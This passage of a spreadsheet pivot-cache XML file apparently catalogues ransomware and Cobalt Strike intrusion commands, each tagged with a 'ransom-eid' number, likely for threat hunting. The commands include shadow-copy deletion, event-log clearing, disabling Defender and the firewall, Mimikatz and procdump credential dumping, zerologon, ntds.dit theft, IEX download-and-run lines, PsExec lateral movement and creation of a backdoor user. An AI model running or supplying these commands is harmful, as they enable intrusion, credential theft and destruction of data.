    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0220"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic.exe Shadowcopy Delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0221"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic csproduct get UUID"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0222"/>
    <m/>
    <m/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0223"/>
    <m/>
    <m/>
    <s v="for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0224"/>
    <m/>
    <m/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0225"/>
    <m/>
    <m/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0227"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0228"/>
    <m/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0229"/>
    <m/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21"/>
  </r>
  <r>
    <s v="ransom-eid0230"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="“C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="21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21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1"/>
  </r>
  <r>
    <s v="ransom-eid0233"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell SCHTASKS /s ip\hostname /run /TN &quot;WindowsSensor15&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0234"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell schtasks /S ip\hostname /TN &quot;WindowsSensor15&quot; /DELETE /F"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0239"/>
    <m/>
    <m/>
    <s v="delete DsMpEng.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0241"/>
    <m/>
    <m/>
    <s v="NetSh Advfirewall set allprofiles state off"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0242"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=&quot;remote desktop&quot; new enable=Yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0243"/>
    <m/>
    <m/>
    <s v="netsh firewall set service type =remotedesktop mode=enable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0244"/>
    <m/>
    <m/>
    <s v="New-NetFirewallRule -DisplayName &quot;New RDP Port 1350&quot; -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0245"/>
    <m/>
    <m/>
    <s v="New-NetFirewallRule -DisplayName &quot;New RDP Port 1350&quot; -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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1"/>
  </r>
  <r>
    <s v="ransom-eid0248"/>
    <m/>
    <m/>
    <s v="Esentutl /p C:\log\ntds.dit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0253"/>
    <m/>
    <m/>
    <s v="privilege::debug"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0254"/>
    <m/>
    <m/>
    <s v="sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0255"/>
    <m/>
    <m/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0422"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0257"/>
    <m/>
    <m/>
    <s v="psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList &quot;Password1, Welcome1, 1qazXDR% +&quot; -LockoutThreshold 5"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0258"/>
    <m/>
    <m/>
    <s v="netscan.exe /hide /auto:&quot;result.xml&quot; /config:netscan.xml /range:192.168.0.1-192.168.1.255"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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4"/>
  </r>
  <r>
    <s v="ransom-eid0485"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0618"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="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26"/>
  </r>
  <r>
    <s v="ransom-eid0269"/>
    <m/>
    <m/>
    <s v="7za.exe a -tzip -mx5 \DC01\C$\temp\log.zip\DC01\C$\temp\log -pTOPSECRETPASSWORD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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1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1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1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1"/>
  </r>
  <r>
    <s v="ransom-eid0275"/>
    <m/>
    <m/>
    <s v="remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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1"/>
  </r>
  <r>
    <s v="ransom-eid0285"/>
    <m/>
    <m/>
    <s v="psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt &gt;&gt; C:\ProgramData\out.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0286"/>
    <m/>
    <m/>
    <s v="Invoke-UserHunter"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0287"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0289"/>
    <m/>
    <m/>
    <s v="ngrok authtoken1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0290"/>
    <m/>
    <m/>
    <s v="ngrok tcp 3389"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0292"/>
    <m/>
    <m/>
    <s v="PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0294"/>
    <m/>
    <m/>
    <s v="shell setup_undefined.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0295"/>
    <m/>
    <m/>
    <s v="MSBuild Install Atera Agent "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0296"/>
    <m/>
    <m/>
    <s v="shell setup_undefined.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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2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1"/>
  </r>
  <r>
    <s v="ransom-eid0300"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="WMIC /node:&quot;DC.example.domain&quot; process call create &quot;rundll32 C:\PerfLogs\arti64.dll, StartW&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0627"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealTimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0302"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0305"/>
    <m/>
    <m/>
    <s v="ping hostname.domain.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0311"/>
    <m/>
    <m/>
    <s v="cmd.exe /C reg query HKLM\System\CurrentControlSet\Control\Lsa\Kerbberos\Parameters"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0313"/>
    <m/>
    <m/>
    <s v="Invoke-CheckLocalAdminAccess"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0314"/>
    <m/>
    <m/>
    <s v="Get-NetComputer -operatingsystem *server*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0315"/>
    <m/>
    <m/>
    <s v="Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0316"/>
    <m/>
    <m/>
    <s v="Find-LocalAdminAccess"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0317"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22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22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22"/>
  </r>
  <r>
    <s v="ransom-eid0320"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir \\Server\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22"/>
  </r>
  <r>
    <s v="ransom-eid0321"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C rundll32 C:\Windows\system32\SQL.dll, StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0322"/>
    <m/>
    <m/>
    <s v="rundll32 C:\PerfLogs\arti64.dll, rundll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0329"/>
    <m/>
    <m/>
    <s v="ping DOMAINCONTROLLER"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0330"/>
    <m/>
    <m/>
    <s v="cmd.exe /C time"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0629"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell Set-MpPreference -DisableIOAVProtection $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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2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2"/>
  </r>
  <r>
    <s v="ransom-eid0343"/>
    <m/>
    <m/>
    <s v="mmc.exe&quot; &quot;C:\Windows\System32\gpedit.msc&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0344"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c echo 92d8cc45954 &gt;; \\.\pipe\446b3c"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0345"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\BA6b.tmp.dll, StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3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3"/>
  </r>
  <r>
    <s v="ransom-eid0347"/>
    <m/>
    <m/>
    <s v="cmd.exe /c echo a3fed5b3a32 &gt; \\.\pipe\3406c2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0351"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35806/'); Find-LocalAdminAccess"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0352"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35585/'); Get-NetComputer -ping -operatingsystem *server*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0353"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0354"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0355"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping HOST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3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3"/>
  </r>
  <r>
    <s v="ransom-eid0358"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C time"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0359"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C C:\Windows\Temp\adf\adf.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0367"/>
    <m/>
    <m/>
    <s v="rundll32.exe &quot;C:\Users\REDACTED\AppData\Local\Temp\rate_x32.dat&quot;,update /i:&quot;LaborBetray\license.dat&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0368"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0369"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0370"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0377"/>
    <m/>
    <m/>
    <s v="cmd.exe /C dsquery subnet -limit 0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23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23"/>
  </r>
  <r>
    <s v="ransom-eid0379"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netsh firewall set service type = remotedesktop mode = enable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0380"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netsh firewall set rule group=&quot;remote desktop&quot; new enable=Yes "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0381"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netsh advfirewall set rule group=&quot;remote desktop&quot; new enable=Yes "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0382"/>
    <m/>
    <m/>
    <s v="cmd.exe /C copy 192145.dll \\&lt;INTERNAL_IP&gt;\ADMIN$ /Y /Z "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0383"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -d -s \\&lt;INTERNAL_IP&gt; rundll32.exe C:\windows\192145.dll,StartW "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0384"/>
    <m/>
    <m/>
    <s v="net user /add /Y nuuser 7HeC00l3stP@ssw0rd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0386"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0387"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0388"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0394"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd.exe /c whoami /groups"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0395"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd.exe /c dir &amp;homedrive%homepath%"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0396"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c query session"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0398"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c nltext /domain_trust"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23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23"/>
  </r>
  <r>
    <s v="ransom-eid0402"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C gpupdate /force"/>
    <s v="“rundll32.exe” c:\windows\192145.dll,StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0403"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C gpupdate /force"/>
    <s v="C:\Windows\System32\dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23"/>
  </r>
  <r>
    <s v="ransom-eid0404"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C gpupdate /force"/>
    <s v="C:\Users\USER\AppData\Local\Temp\icju1.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="23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23"/>
  </r>
  <r>
    <s v="ransom-eid0406"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0407"/>
    <m/>
    <m/>
    <s v="ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;cr fu C:\Perflogs\1&quot; q q "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0408"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0412"/>
    <m/>
    <m/>
    <s v="whoami.exe&quot; /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0420"/>
    <m/>
    <m/>
    <s v="Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0421"/>
    <m/>
    <m/>
    <s v="Get-NetComputer –ping "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0630"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0423"/>
    <m/>
    <m/>
    <s v="IEX(New - Object Net.Webclient).DownloadString('http://IP:port/')"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4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4"/>
  </r>
  <r>
    <s v="ransom-eid0425"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic /node: DEVICE LOCAL process call create &quot;c:\Users\165.bat&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4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4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4"/>
  </r>
  <r>
    <s v="ransom-eid0428"/>
    <m/>
    <m/>
    <s v="regsvr32 /s C:\Users\user\appdata\local\temp\random.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4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26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4"/>
  </r>
  <r>
    <s v="ransom-eid0431"/>
    <m/>
    <m/>
    <s v="esentutl /p /o c:\Users\user\AppData\Local\Temp\grabber_temp.edb"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0432"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c echo b30f789ed5b &gt; \\. \pipe\2b5fe9 "/>
    <m/>
    <m/>
    <s v="wuauclt.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0434"/>
    <m/>
    <m/>
    <s v="shell whoami"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0435"/>
    <m/>
    <m/>
    <s v="shell whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0633"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="“powershell.exe -ExecutionPolicy Bypass -file \\[REMOTE _ HOSTNAME]\share$\p.ps1”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0440"/>
    <m/>
    <m/>
    <s v="psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out- File -Encoding ascii C:\ProgramData\sh.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0441"/>
    <m/>
    <m/>
    <s v="psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24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26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24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24"/>
  </r>
  <r>
    <s v="ransom-eid0445"/>
    <m/>
    <m/>
    <s v="execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0446"/>
    <m/>
    <m/>
    <s v="log nameoflog.log"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0447"/>
    <m/>
    <m/>
    <s v="privilege::debug_x000a_"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0448"/>
    <m/>
    <m/>
    <s v="lsadump::dcsync /user:Administrator"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0449"/>
    <m/>
    <m/>
    <s v="sekurlsa::pth /user: /domain: /ntlm: /run:cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0450"/>
    <m/>
    <m/>
    <s v="procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0451"/>
    <m/>
    <m/>
    <s v="mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$/exploit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0452"/>
    <m/>
    <m/>
    <s v="mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
